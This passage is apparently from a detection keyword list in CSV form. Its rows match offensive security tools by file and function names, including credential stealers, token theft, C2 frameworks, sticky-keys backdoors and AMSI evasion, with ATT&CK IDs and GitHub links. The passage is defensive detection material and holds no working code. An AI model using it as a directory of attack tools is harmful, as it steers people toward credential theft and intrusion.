"*Start-PSAmsiClient.ps1*",".{0,1000}Start\-PSAmsiClient\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Start-PSAmsiServer.ps1*",".{0,1000}Start\-PSAmsiServer\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Starts a PSCMD channel on the remote end*",".{0,1000}Starts\sa\sPSCMD\schannel\son\sthe\sremote\send.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*Starts the godoh C2 server*",".{0,1000}Starts\sthe\sgodoh\sC2\sserver.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*Starts the godoh C2 server*",".{0,1000}Starts\sthe\sgodoh\sC2\sserver.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*Start-SimpleHTTPServer.ps1*",".{0,1000}Start\-SimpleHTTPServer\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Start-TCPMonitor*",".{0,1000}Start\-TCPMonitor.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Start-MonitorTCPConnections.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*startupfolderperistence.py*",".{0,1000}startupfolderperistence\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*Start-WebServer.ps1*",".{0,1000}Start\-WebServer\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*StartWebServiceBeacon*",".{0,1000}StartWebServiceBeacon.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*static_syscalls_apc_spawn *",".{0,1000}static_syscalls_apc_spawn\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*static_syscalls_apc_spawn*",".{0,1000}static_syscalls_apc_spawn.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*static_syscalls_dump*",".{0,1000}static_syscalls_dump.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*statistically-likely-usernames*",".{0,1000}statistically\-likely\-usernames.{0,1000}","offensive_tool_keyword","statistically-likely-usernames","This resource contains wordlists for creating statistically likely usernames for use in username-enumeration. simulated password-attacks and other security testing tasks.","T1210.001 - T1583.001 - T1583.002","TA0007 - ","N/A","N/A","Credential Access","https://github.com/insidetrust/statistically-likely-usernames","1","1","N/A","N/A","8","799","118","2022-08-31T20:27:53Z","2016-02-14T23:24:39Z" "*StayKit.cna*",".{0,1000}StayKit\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*StayKit.cna*",".{0,1000}StayKit\.cna.{0,1000}","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*StayKit.exe*",".{0,1000}StayKit\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*StayKit.git*",".{0,1000}StayKit\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*Steal_Pipe_Token /PipeName*",".{0,1000}Steal_Pipe_Token\s\/PipeName.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*steal_token *",".{0,1000}steal_token\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*steal_token(*",".{0,1000}steal_token\(.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "*steal_token.py*",".{0,1000}steal_token\.py.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "*steal_token_access_mask*",".{0,1000}steal_token_access_mask.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "*steal-cert.py*",".{0,1000}steal\-cert\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*StealCookie-28050355-D9DF-4CE7-BFBC-4F7DDE890C2A.json*",".{0,1000}StealCookie\-28050355\-D9DF\-4CE7\-BFBC\-4F7DDE890C2A\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*StealDhcpSecrets.c*",".{0,1000}StealDhcpSecrets\.c.{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","1","N/A","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*StealDhcpSecrets.exe*",".{0,1000}StealDhcpSecrets\.exe.{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","1","N/A","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*Stealer.exe *",".{0,1000}Stealer\.exe\s.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*StealPowerAutomateToken-C4E7B7DA-54E4-49AB-B634-FCCD77C65025.json*",".{0,1000}StealPowerAutomateToken\-C4E7B7DA\-54E4\-49AB\-B634\-FCCD77C65025\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*StealTokenClient.exe *",".{0,1000}StealTokenClient\.exe\s.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*StealTokenClient\StealTokenClient.cs*",".{0,1000}StealTokenClient\\StealTokenClient\.cs.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*StealTokenDrv_x64.sys*",".{0,1000}StealTokenDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*Sticky Key backdoor has been removed*",".{0,1000}Sticky\sKey\sbackdoor\shas\sbeen\sremoved.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","9","1","26","7","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z" "*Sticky Keys backdoor added.*",".{0,1000}Sticky\sKeys\sbackdoor\sadded\..{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","9","1","26","7","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z" "*Sticky Keys backdoor does not exist, let's add it*",".{0,1000}Sticky\sKeys\sbackdoor\sdoes\snot\sexist,\slet\'s\sadd\sit.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","9","1","26","7","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z" "*Sticky-Keys-Slayer*",".{0,1000}Sticky\-Keys\-Slayer.{0,1000}","offensive_tool_keyword","Sticky-Keys-Slayer","Scans for accessibility tools backdoors via RDP","T1078 - T1015 - T1203","TA0003 - TA0007 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/linuz/Sticky-Keys-Slayer","1","1","N/A","N/A","4","322","70","2018-03-16T15:59:41Z","2016-08-06T18:55:28Z" "*StickyNotesExtract.exe*",".{0,1000}StickyNotesExtract\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*stinger_client -*",".{0,1000}stinger_client\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","0","N/A","10","10","1336","207","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*stinger_client.py*",".{0,1000}stinger_client\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 